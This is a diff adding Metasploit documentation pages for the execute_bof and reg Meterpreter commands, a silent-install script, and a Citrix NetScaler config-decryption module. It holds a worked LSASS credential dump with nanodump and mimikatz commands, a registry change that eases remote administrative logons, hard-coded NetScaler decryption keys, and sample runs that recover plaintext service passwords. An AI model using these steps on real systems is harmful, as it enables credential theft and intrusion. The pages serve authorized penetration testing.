+BOF argument types are defined in the format string argument with `-f` / `--format-string`.
+
+The following table describes each of the types.
+
+| Type    | Description                                                     | Unpack With (C)               |
+| --------|-----------------------------------------------------------------|-------------------------------|
+| b       | binary data (e.g. 01020304, file:/path/to/file.bin)<sup>1</sup> | BeaconDataExtract             |
+| i       | 32-bit integer (e.g. 0x1234, 5678)<sup>2</sup>                  | BeaconDataInt                 |
+| s       | 16-bit integer (e.g. 0x1234, 5678)<sup>2</sup>                  | BeaconDataShort               |
+| z       | null-terminated utf-8 string                                    | BeaconDataExtract             |
+| Z       | null-terminated utf-16 string                                   | (wchar_t *)BeaconDataExtract  |
+
+<sup>1</sup> Binary data arguments are specified as either a stream of hex characters or as the path to a file local to
+the Metasploit Framework instance. In the case of a file path, it must be prefixed with `file:`.
+
+<sup>2</sup> Integer arguments are specified as either decimal or hexadecimal literals.
+
+Unknown arguments are treated as BOF arguments. Additionally, any arguments after the `--` terminator are explicitly
+treated as BOF arguments. Using the terminator allows ambiguous arguments to such as `--help` to be forward to the BOF
+instead of being processed locally. The number of BOF arguments to be forward must equal number of characters in the
+argument format string.
+
+# Usage Examples
+Executing [dir][4], passing the path argument and number of sub-directories to list.
+
+```
+meterpreter > execute_bof CS-Situational-Awareness-BOF/SA/dir/dir.x64.o --format-string Zs C:\\ 0
+Contents of C:\*:
+	08/05/2022 15:17           <dir> $Recycle.Bin
+	08/05/2022 15:16      <junction> Documents and Settings
+	09/22/2022 08:35      1342177280 pagefile.sys
+	08/05/2022 16:48           <dir> PerfLogs
+	09/08/2022 12:51           <dir> Program Files
+	09/15/2018 05:06           <dir> Program Files (x86)
+	08/05/2022 15:26           <dir> ProgramData
+	09/07/2022 10:24           <dir> Python27
+	08/05/2022 15:16           <dir> Recovery
+	08/05/2022 15:40           <dir> System Volume Information
+	08/05/2022 15:16           <dir> Users
+	09/01/2022 13:49           <dir> Windows
+	                      1342177280 Total File Size for 1 File(s)
+	                                                     11 Dir(s)
+
+meterpreter > 
+```
+
+Executing [nanodump][5]. First the PID of LSASS is found, then the argument string is constructed. The output must be
+written to disk. Once completed, the dump file can be downloaded from the remote host.
+
+```
+meterpreter > ps lsass
+Filtering on 'lsass'
+
+Process List
+============
+
+ PID  PPID  Name       Arch  Session  User                 Path
+ ---  ----  ----       ----  -------  ----                 ----
+ 712  556   lsass.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe
+
+meterpreter > execute_bof nanodump.x64.o --format-string iziiiiiiiiziiiz 712 nanodump.dmp 1 1 0 0 0 0 0 0 "" 0 0 0 ""
+Done, to download the dump run:
+download nanodump.dmp
+to get the secretz run:
+python3 -m pypykatz lsa minidump nanodump.dmp
+mimikatz.exe "sekurlsa::minidump nanodump.dmp" "sekurlsa::logonPasswords full" exit
+meterpreter > download nanodump.dmp 
+[*] Downloading: nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 1.00 MiB of 11.56 MiB (8.65%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 2.00 MiB of 11.56 MiB (17.31%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 3.00 MiB of 11.56 MiB (25.96%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 4.00 MiB of 11.56 MiB (34.62%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 5.00 MiB of 11.56 MiB (43.27%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 6.00 MiB of 11.56 MiB (51.92%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 7.00 MiB of 11.56 MiB (60.58%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 8.00 MiB of 11.56 MiB (69.23%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 9.00 MiB of 11.56 MiB (77.89%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 10.00 MiB of 11.56 MiB (86.54%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 11.00 MiB of 11.56 MiB (95.2%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 11.56 MiB of 11.56 MiB (100.0%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] download   : nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+meterpreter > 
+```
+
+# References
+
+* [hstechdocs.helpsystems.com/manuals/cobaltstrike][6] for Cobalt Strike's BOF documentation
+* [beacon.h][2] source code for the BOF API
+* [TrustedSec/COFFLoader][3] for the source code of the loader
+* [trustedsec/CS-Situational-Awareness-BOFF][7] for a collection of useful BOFs
+
+[1]: https://en.wikipedia.org/wiki/COFF
+[2]: https://github.com/Cobalt-Strike/bof_template/blob/4a5009fc4adeb35bb1b1887da478280f12f9693a/beacon.h
+[3]: https://github.com/TrustedSec/COFFLoader
+[4]: https://github.com/trustedsec/CS-Situational-Awareness-BOF/tree/master/src/SA/dir
+[5]: https://github.com/helpsystems/nanodump
+[6]: https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_main.htm
+[7]: https://github.com/trustedsec/CS-Situational-Awareness-BOF
@@ -0,0 +1,229 @@
+This guide outlines how to use Meterpreter to manipulate the registry, similar to the `regedit.cmd` program on a Windows machine.
+
+# Concepts
+
+The Window's registry is used to store configuration settings for both the operating system, as well as software applications. This registry is hierarchical and stores keys and values. The registry keys are similar to folders, and registry values are similar to files. Each registry key should be unique and is separated by backslashes - similar to a Window's filepath.
+
+## Root keys
+
+Every registry key must start from one of the following root keys or abbreviations:
+
+- `HKEY_LOCAL_MACHINE` or `HKLM`
+- `HKEY_CURRENT_USER` or `HKCU`
+- `HKEY_USERS` or `HKU`
+- `HKEY_CLASSES_ROOT` or `HKCR`
+- `HKEY_CURRENT_CONFIG` or `HKCC`
+- `HKEY_PERFORMANCE_DATA` or `HKPD`
+- `HKEY_DYN_DATA` or `HKDD`
+
+## Value types
+
+Each value also has an associated type, for example:
+
+- `REG_NONE`
+- `REG_BINARY`
+- `REG_DWORD` / `REG_DWORD_LITTLE_ENDIAN` / `REG_DWORD_BIG_ENDIAN` - 32-bit number
+- `REG_QWORD` / `REG_QWORD_LITTLE_ENDIAN` - 64-bit number
+- `REG_SZ` - String value, terminated with a null byte
+- `REG_EXPAND_SZ` - String value which contains unexpanded environment variables, i.e. `%APPDATA%`
+- `REG_MULTI_SZ` - An array of strings. Each string is separated by a null byte, with a final trailing null byte. i.e. `line1\0line2\0\line3\0\0`
+
+# Examples
+
+All of these examples assume you are in a Meterpreter session. To see the latest help information run `help reg`:
+
+```
+meterpreter > help reg
+Usage: reg [command] [options]
+Interact with the target machine's registry.
+```
+
+## Common mistakes
+
+### Escaping keys
+
+Registry keys must be escaped correctly. Window's registry keys are escaped with backslashes. In msfconsole backslashes and spaces have a special meaning - which means you will need to escape these characters for your key to work as expected.
+
+```
+# Valid: Using single quotes around the registry key
+meterpreter > reg enumkey -k 'HKCU\Keyboard Layout'
+
+# Valid: Escaping the backslash and spaces within the registry key
+meterpreter > reg enumkey -k HKCU\\Keyboard\ Layout
+
+# Invalid examples: The user has not escaped backslashes or spaces correctly:
+meterpreter > reg enumkey -k HKLM\SAM
+meterpreter > reg enumkey -k HKCU\\Keyboard Layout
+```
+
+### 32/64 bit differences
+
+The result of your registry queries can be impacted if you are interacting with a x86 or x64 Windows session.
+You can see the type of session you currently have open with the `sessions` command:
+
+```
+msf6 exploit(windows/smb/psexec) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                            Connection
+  --  ----  ----                     -----------                            ----------
+  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R  192.168.123.1:4444 -> 192.168.123.141:58209 (192.168.123.141)
+  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R  192.168.123.1:4433 -> 192.168.123.141:58263 (192.168.123.141)
+```
+
+For example - when interacting with a x86 session there are 12 keys listed:
+
+```
+# x86 Session
+meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
+Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
+
+  Keys (12):
+  # ... omitted for clarity ...
+```
+
+Versus a x64 session which shows 23 keys:
+
+```
+# x64 Session
+meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
+Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
+
+  Keys (23):
+
+  # ... omitted for clarity ...
+```
+
+If this is problematic either [[upgrade your session to Meterpreter|./Metasploit-Guide-Upgrading-Shells-to-Meterpreter.md]], or specify the `-w` flag which will impact the result of queries:
+
+```
+meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows' -w 32
+Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
+
+  Keys (12):
+  # ... omitted for clarity ...
+```
+
+```
+meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows' -w 64
+Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
+
+  Keys (23):
+
+  # ... omitted for clarity ...
+```
+
+## Enumerate registry keys
+
+Enumerate a root key:
+
+```
+meterpreter > reg enumkey -k HKLM
+Enumerating: HKLM
+
+  Keys (6):
+
+        BCD00000000
+        HARDWARE
+        SAM
+        SECURITY
+        SOFTWARE
+        SYSTEM
+```
+
+Enumerate a subkey:
+
+```
+meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run'
+Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
+
+  Values (2):
+
+        SecurityHealth
+        VMware User Process
+```
+
+## Query values
+
+Display the registry value and type information:
+
+```
+meterpreter > reg queryval -k 'HKLM\Software\Microsoft\Windows NT\CurrentVersion' -v ProductName
+Key: HKLM\Software\Microsoft\Windows NT\CurrentVersion
+Name: ProductName
+Type: REG_SZ
+Data: Windows 10 Enterprise
+```
+
+Values that are of type `REG_SZ_EXPAND` such as ` %SystemRoot%\system32\drivers\GM.DLS` will not automatically be expanded:
+
+```
+meterpreter > reg queryval -k 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectMusic' -v 'GMFilePath'
+Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectMusic
+Name: GMFilePath
+Type: REG_EXPAND_SZ
+Data: C:\Windows\system32\drivers\GM.DLS
+```
+
+Values that are of type `REG_MULTI_SZ` will be separated by `\0`:
+
+```
+meterpreter > reg queryval -k 'HKLM\Software\example' -v 'example multi value with spaces'
+Key: HKLM\Software\example
+Name: example multi value with spaces
+Type: REG_MULTI_SZ
+Data: line1\0line2\0line3
+```
+
+### Creating a key
+
+```
+meterpreter > reg createkey -k 'HKLM\software\example'
+Successfully created key: HKLM\software\example
+```
+
+### Setting a value
+
+Setting a `REG_DWORD` - use a decimal value:
+
+```
+meterpreter > reg setval -k 'HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\system' -v LocalAccountTokenFilterPolicy -t REG_DWORD -d 1
+Successfully set LocalAccountTokenFilterPolicy of REG_DWORD.
+```
+
+Setting a `REG_QWORD` - use a decimal value:
+
+```
+meterpreter > reg setval -k 'HKLM\Software\example' -t REG_DWORD -v qword_example -d 12345678
+Successfully set example multi value with spaces of REG_MULTI_SZ.
+```
+
+Setting `REG_MULTI_SZ` - i.e. an array of strings:
+
+```
+meterpreter > reg setval -k 'HKLM\Software\example' -t REG_MULTI_SZ -v 'example multi value with spaces' -d 'line1\0line2\0line3'
+Successfully set example multi value with spaces of REG_MULTI_SZ.
+```
+
+Setting `REG_BINARY` - use lowercase hexadecimal input without the preceding `0x`:
+
+```
+meterpreter > reg setval -k 'HKLM\Software\example' -t REG_BINARY -v binary_example -d deadbeef
+Successfully set binary_example of REG_BINARY.
+```
+
+### Deleting a key
+
+```
+meterpreter > reg deletekey -k 'HKLM\software\example'
+Successfully deleted key: HKLM\software\example
+```
+
+### Deleting a value
+
+```
+meterpreter > reg deleteval -k 'HKLM\software\example' -v 'example multi value with spaces'
+Successfully deleted example multi value with spaces.
+```
@@ -30,6 +30,33 @@ Download the [latest Windows installer](https://windows.metasploit.com/metasploi

 If you downloaded Metasploit from us, there is no cause for alarm.  We pride ourselves on offering the ability for our customers and followers to have the same toolset that the hackers have so that they can test systems more accurately.  Because these (and the other exploits and tools in Metasploit) are identical or very similar to existing malicious toolsets, they can be used for nefarious purposes, and they are often flagged and automatically removed by antivirus programs, just like the malware they mimic.

+### Windows silent installation
+
+The PowerShell below will download and install the framework, and is suitable for automated Windows deployments. Note that, the installer will be downloaded to `$DownloadLocation` and won't be deleted after the script has run.
+```
+[CmdletBinding()]
+Param(
+    $DownloadURL = "https://windows.metasploit.com/metasploitframework-latest.msi",
+    $DownloadLocation = "$env:APPDATA/Metasploit",
+    $InstallLocation = "C:\Tools",
+    $LogLocation = "$DownloadLocation/install.log"
+)
+
+If(! (Test-Path $DownloadLocation) ){
+    New-Item -Path $DownloadLocation -ItemType Directory
+}
+
+If(! (Test-Path $InstallLocation) ){
+    New-Item -Path $InstallLocation -ItemType Directory
+}
+
+$Installer = "$DownloadLocation/metasploit.msi"
+
+Invoke-WebRequest -UseBasicParsing -Uri $DownloadURL -OutFile $Installer
+
+& $Installer /q /log $LogLocation INSTALLLOCATION="$InstallLocation"
+```
+
 ## Improving these installers

 Feel free to review and help improve [the source code for our installers](https://github.com/rapid7/metasploit-omnibus).
@@ -211,6 +211,14 @@ NAVIGATION_CONFIG = [
                path: 'Meterpreter-Debugging-Meterpreter-Sessions.md',
                title: without_prefix('Meterpreter ')
              },
+              {
+                path: 'Meterpreter-ExecuteBof-Command.md',
+                title: without_prefix('Meterpreter ')
+              },
+              {
+                path: 'Meterpreter-Reg-Command.md',
+                title: without_prefix('Meterpreter ')
+              },
              {
                path: 'How-to-get-started-with-writing-a-Meterpreter-script.md'
              },
@@ -268,13 +276,17 @@ NAVIGATION_CONFIG = [
            nav_order: 1
          },
          {
-            path: 'dev/Setting-Up-a-Metasploit-Development-Environment.md',
+            path: 'Creating-Your-First-PR.md',
            nav_order: 2
          },
          {
-            path: 'Sanitizing-PCAPs.md',
+            path: 'dev/Setting-Up-a-Metasploit-Development-Environment.md',
            nav_order: 3
          },
+          {
+            path: 'Sanitizing-PCAPs.md',
+            nav_order: 4
+          },
          {
            old_wiki_path: "Navigating-and-Understanding-Metasploit's-Codebase.md",
            path: 'Navigating-and-Understanding-Metasploits-Codebase.md',
@@ -434,6 +446,10 @@ NAVIGATION_CONFIG = [
                path: 'How-to-use-PhpEXE-to-exploit-an-arbitrary-file-upload-bug.md',
                title: 'PhpExe'
              },
+              {
+                path: 'How-to-use-the-Git-mixin-to-write-an-exploit-module.md',
+                title: 'Git Mixin'
+              },
              {
                title: 'HTTP',
                folder: 'http',
@@ -0,0 +1,212 @@
+This module takes a Citrix NetScaler `ns.conf` configuration file as input and extracts secrets that
+have been stored with reversible encryption. The module supports legacy NetScaler encryption (RC4)
+as well as the newer AES-256-ECB and AES-256-CBC encryption types. It is also possible to decrypt
+secrets protected by the Key Encryption Key (KEK) method, provided the key fragment files F1.key
+and F2.key are provided. Currently, keys for appliances in FIPS mode or running hardware HSM cannot 
+be extracted. Root access to a NetScaler device or access to a NetScaler configuration backup are
+the most effective means of acquiring the configuration file and key fragments.
+
+This module incorporates research published by dozer:
+
+https://dozer.nz/posts/citrix-decrypt/
+
+## Vulnerable Application
+This module is tested against the configuration files for NetScaler versions 10.x, 11x, 12.x and
+13.x. The module will work with files retrieved from a live NetScaler system as well as files
+extracted from an unencrypted NetScaler backup archive. This is possible because NetScaler uses
+well-known hard coded encryption keys which are visible on the system in the hidden file:
+
+`/nsconfig/.skf`
+
+These static keys are:
+
+```
+NetScaler RC4:
+  2286da6ca015bcd9b7259753c2a5fbc2
+NetScaler AES:
+  351cbe38f041320f22d990ad8365889c7de2fcccae5a1a8707e21e4adccd4ad9
+```
+The module is also able to decrypt secrets encrypted with NetScaler KEK, provided the associated
+`F1.key` and `F2.key` fragments are provided. Private key passphrases that use `-passcrypt` are not
+currently decryptable by this module, but any secret that uses the `-encrypted` parameter should be
+fully recoverable.
+
+## Verification Steps
+You must possess a NetScaler `ns.conf` file in order to use this module. If the NetScaler is running
+NS13.0 Build76.xx.nc or higher, or the administrator has configured KEK encryption, you must also
+possess the associated KEK key fragments in order to decrypt the file. All files must be local to
+the system invoking the module. Where possible, you should provide the `NS_IP` option to tag
+relevant loot entries with the IPv4 address of the originating system. If no value is provided for
+`NS_IP` the module defaults to assigning the loopback IP `127.0.0.1`.
+
+1. Acquire the `ns.conf` file, and associated `F1.key` and `F2.key` files if using NS KEK
+2. Start msfconsole
+3. Do: `modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt.rb`
+4. Do: `set ns_conf <path to ns.conf>` to provide the location of the NetScaler config file
+5. Do: `set ns_kek_f1 <path to f1.key>` if you are decrypting a file using NS KEK
+6. Do: `set ns_kek_f2 <path to f2.key>` if you are decrypting a file using NS KEK
+6. Do: `set ns_ip <NetScaler IPv4>` to attach the target NetScaler IPv4 address to loot entries
+7. Do: `dump`
+
+## Options
+### NS_CONF
+
+Path to the NetScaler configuration file on the local system. Example: `/tmp/ns.conf`
+
+### NS_KEK_F1
+
+Path to the first of two NS KEK fragments, if decrypting NS KEK. Example: `/tmp/F1.key`
+
+### NS_KEK_F2
+
+Path to the second  of two NS KEK fragments, if decrypting NS KEK. Example: `/tmp/F2.key`
+
+### NS_IP
+
+Optional parameter to set the IPv4 address associated with loot entries made by the module.
+
+## Scenarios
+
+### Acquire NetScaler Config File
+NetScaler configuration files can be retrieved from a live system by running
+
+`show ns.conf`
+
+From the nscli or
+
+`cat /nsconfig/ns.conf`
+
+from the BSD shell. These files can also be retrieved from NetScaler configuration backup
+archives which are generated from the appliance admin interface.
+
+### Acquire KEK Fragment Files
+As of NS13.0 Build76.xx.nc NetScaler requires mandatory use of the Key Encryption Key (KEK)
+scheme. If secrets within the config file use KEK, you must also posses the associated KEK F1
+and F2 fragment files in order to perform decryption. Secrets that require KEK fragments to
+decrypt will include the `-kek` parameter on the associated configuration line. It is possible
+for an admin to manually enable KEK in NS builds prior to Build76.xx.nc - if this has been done,
+the current KEK key fragments are located in the following paths:
+
+`/nsconfig/F1.key`
+`/nsconfig/F2.key`
+
+After NS13.0 Build76.xx.nc, KEK is mandatory and managed by the NetScaler itself. Key fragments
+are presumably regenerated during firmware upgrades, and a journal is maintained in `/nsconfig/keys`
+suffixed with a date stamp. The `F1.key` and `F2.key` files are ignored, and the new "current" KEK
+key is stored in hidden files at paths:
+
+`/nsconfig/.F1.key`
+`/nsconfig/.F2.key`
+
+As well as under `/nsconfig/keys`. Note that both fragments must be provided for successful
+decryption. The module can be run without providing KEK fragments, but will be unable to decrypt
+any secrets that use KEK encryption. An unencrypted NetScaler backup archive will contain all KEK
+fragments currently defined on the appliance as well as the current `ns.conf` file.
+
+### Running the Module
+
+Example run against config file without KEK from NetScaler VPX running NS11.0 Build 62.10.nc:
+```
+msf6 > use modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_conf /tmp/ns.conf.NS11.0-62.10.conf
+ns_conf => /tmp/ns.conf.NS11.0-62.10.conf
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > dump
+
+[*] Config line:
+add ssl certKey netscaler_cesium137_io -cert netscaler_cesium137_io.pem -key netscaler_cesium137_io.key -passcrypt "VbuAvo9nq18Zap0joBBv1a1Chm5BOerJ3GhYWU+Wbv0=" -expiryMonitor DISABLED
+[!] Not decrypting passcrypt entry:
+[!] Ciphertext: VbuAvo9nq18Zap0joBBv1a1Chm5BOerJ3GhYWU+Wbv0=
+[*] Config line:
+set ns encryptionParams -method AES256 -keyValue 7654526a2f3ceffd877b286a8acece43da700d06133dc985f7ebdeb076135bcb755472e04f5d92aba9f07334eb8e936a58782ce76bb3f6d6e44adf727e8e88d602b8bdae1817d26203fe281a8429574d -encrypted -encryptmethod ENCMTHD_3
+[+] Plaintext: AAAAAAXyju437Ecnb/iQpa55uUvOskx7S5hCq5dB4kMq+Lcx6g==
+[*] Config line:
+add authentication radiusAction UTIL1 -serverIP 10.100.10.13 -serverPort 1812 -radKey f8e4f532e9d4e6bebab169b3be9e77b5c851466b7760c469bd64a15d2e8d3c602025c41372094d06e207789d58b6acb7 -encrypted -encryptmethod ENCMTHD_3
+[+] Plaintext: hbZaADYDUmdHv7AhHsAb6eCde2M82m0
+[*] Config line:
+add authentication ldapAction LDAP -serverName ldap.cesium137.io -serverPort 636 -ldapBase "DC=chainheart,DC=com" -ldapBindDn wiz@cesium137.io -ldapBindDnPassword f5dc75680b925dbd3c0a8154c8fee056bfe77ac774797de3c0867d368bd09c2cdd872a36e15a1f07abf773740e2c8a12 -encrypted -encryptmethod ENCMTHD_3 -ldapLoginName sAMAccountName -groupAttrName memberOf -secType SSL -ldapHostname ldap.cesium137.io
+[+] User: wiz@cesium137.io
+[+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
+[*] Config line:
+set ns rpcNode 10.100.10.11 -password 9ec84444b10941dc4222f93b29a75f0aa237ffdcc73a81355bf5d1cf3d80058daaad7ca58e488e54bc3ff3eea8ffd9eb -encrypted -encryptmethod ENCMTHD_3 -srcIP 10.100.10.11
+[+] Plaintext: 447a325517739063bbaa414ecf1d9c3
+[*] Config line:
+set ns rpcNode 10.100.10.12 -password dd5c0c4952509e2fcfaeb238dfc361b79a844df09254087920ee0cf4dc447161bde8491d8a39ded0fa2526cc46e6a00f -encrypted -encryptmethod ENCMTHD_3 -srcIP 10.100.10.11
+[+] Plaintext: 447a325517739063bbaa414ecf1d9c3
+[*] Config line:
+add lb monitor mon_ldaps LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password e209865546c3d2e8462e3e7a962252eb6d9e26374163c8d902fc3535cb12638c514765dcea4792eb1e3e6b5e1c1c4cef -encrypted -encryptmethod ENCMTHD_3 -LRTM DISABLED -secure YES -baseDN "DC=chainheart,DC=com" -bindDN wiz@cesium137.io -filter CN=builtin
+[+] User: wiz@cesium137.io
+[+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
+[*] Config line:
+add lb monitor mon_ldap LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password 4ae7bec92e25d985df315e543b846b2c30346840d8e945f5073832c3e479d60eee581f67d671759ae555210529eaec8d -encrypted -encryptmethod ENCMTHD_3 -LRTM DISABLED -destPort 636 -secure YES -baseDN "DC=chainheart,DC=com" -bindDN wiz@cesium137.io -filter CN=builtin
+[+] User: wiz@cesium137.io
+[+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > 
+```
+
+Example run against config file using KEK from NetScaler VPX running NS13.0 Build 85.15.nc:
+
+```
+msf6 > use modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_conf /tmp/ns.conf 
+ns_conf => /tmp/ns.conf
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_kek_f1 /tmp/F1.key
+ns_kek_f1 => /tmp/F1.key
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_kek_f2 /tmp/F2.key
+ns_kek_f2 => /tmp/F2.key
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > dump
+
+[*] Building NetScaler KEK from key fragments ...
+[+] NS KEK F1
+[+]      HEX: dd2588bb3cb20dd643216c33489776c78e8c56f13b1301e0984dc80564eea49e
+[+] NS KEK F2
+[+]      HEX: 45f9e6780a1dc40b6fe75bedf2f6dbb9a86e4315d07313014fe2381c52e44d8f
+[+] Assembled NS KEK AES key
+[+]      HEX: 54f202b9a94649fd9eaa3f13eab514a5a267f460db0a2393f8b25f321a7d79e0
+
+[*] Config line:
+add ssl certKey netscaler_cesium137_io -cert netscaler_cesium137_io.pem -key netscaler_cesium137_io.key 30f39257d8aacc737182568184e0d535002d90a7aba3454c1e8766a958d3a4a720e485c498adc681f0e7559ff633f932 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor DISABLED
+[+] Plaintext: zgkEUD86rUv76coT0DkIBj1xlp5qEzH
+[*] Config line:
+add ssl certKey ldap_cesium137_io -cert ldap_cesium137_io.pem -key ldap_cesium137_io.key d7902778370c616480ef781c5b3922ef31bd90e75dd3aecfa0fa8a5bafc4fa16b20ed2f7a07970c3f4d8ba201a3b9b72 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor ENABLED -notificationPeriod 90
+[+] Plaintext: YaqoRLtSnnMPgnWyhAedYv2RO1aVtx8
+[*] Config line:
+add ssl certKey mail_cesium137_io -cert mail_cesium137_io-g3.pem -key mail_cesium137_io-g3.key 0e5ca2011772a9943c8f4281668b7236a8dfb97da290487d1953fa5ef768272f33d20122b055878729c75c29efaa3291 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor DISABLED
+[+] Plaintext: TBkrkfnP4QOWIT0FX8QCLl2GkNrnM
+[*] Config line:
+add ssl certKey auth_cesium137_io -cert auth_cesium137_io-g3.pem -key auth_cesium137_io-g3.key d574cca92065da27309ce87a423ac82e0c1571cd4c6df59a725f7eabee97d40136a250152506cb15962e34c90f1dc25c -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor DISABLED
+[+] Plaintext: flEkB3SW4YTTi9HRNnffmvJLSgJhsz5
+[*] Config line:
+set ns encryptionParams -method AES256 -keyValue ec5d48485c6871d1d4a2b01f9126946c53aa49eae721c8114ba7a34a1b1f8eabd443a9d641bbf5ef67f2b0237c481673587846db5378f72f9025f0762f8f9cbeebf4a16aaa2782d5c6ecd90c48a1c30d -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35
+[+] Plaintext: AAAAAAXyju437Ecnb/iQpa55uUvOskx7S5hCq5dB4kMq+Lcx6g==
+[*] Config line:
+add authentication radiusAction APP01_DUO -serverIP 10.100.10.13 -serverPort 11812 -authTimeout 60 -radKey 535587632ffe91f2559fcf5902c7e4bf24961ee2e7f6285c03c87c2e65165fbc -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -accounting ON
+[+] Plaintext: IAmSam!
+[*] Config line:
+add authentication radiusAction APP01_DUO_CITRIXRECEIVER -serverIP 10.100.10.13 -serverPort 21812 -authTimeout 60 -radKey 6644f481004ac7dee5a05b5a8dc3d9d9ae8c76f5fe82e0430b43acd7fb5afe9c -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -accounting ON
+[+] Plaintext: IAmSam!
+[*] Config line:
+add authentication ldapAction AD_DUA2FAUSERS -serverName ldap.cesium137.io -serverPort 636 -authTimeout 60 -ldapBase "DC=cesium137,DC=io" -ldapBindDn ldap@cesium137.io -ldapBindDnPassword 7fbbf2ef9665641264406c17673c0cdb5774b76454f3ac8c7bb067dd0d2228c5 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -ldapLoginName sAMAccountName -searchFilter "&(objectCategory=user)(memberOf=CN=2FA-OWA,CN=Users,DC=cesium137,DC=io)" -groupAttrName memberOf -subAttributeName cn -secType SSL -passwdChange ENABLED -nestedGroupExtraction ON -groupNameIdentifier sAMAccountName -groupSearchAttribute memberOf -groupSearchSubAttribute CN
+[+] User: ldap@cesium137.io
+[+] Pass: Gr33n3gg$
+[*] Config line:
+set ns rpcNode 192.168.10.14 -password 2634fa338c457cb32fdf245873874a9b8fcd7128f6534641f49ea650e9f0974b -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -srcIP 192.168.10.14
+[+] Plaintext: SamIAm!
+[*] Config line:
+set ns rpcNode 192.168.10.15 -password 6955e686fc5dd3beee5013dad0e0fa6510a56029b52cc7d7ed15082a60ec6ce4 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -srcIP 192.168.10.14
+[+] Plaintext: SamIAm!
+[*] Config line:
+add lb monitor mon_ldaps LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password cc1f6bb054f5d63d5eb871fdd36ff573f3343c1e0238965682460c6f084d1e14-encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -LRTM DISABLED -secure YES -baseDN "DC=cesium137,DC=io" -bindDN ldap@cesium137.io -filter CN=builtin -devno 13862
+[+] User: ldap@cesium137.io
+[+] Pass: Gr33n3gg$
+[*] Config line:
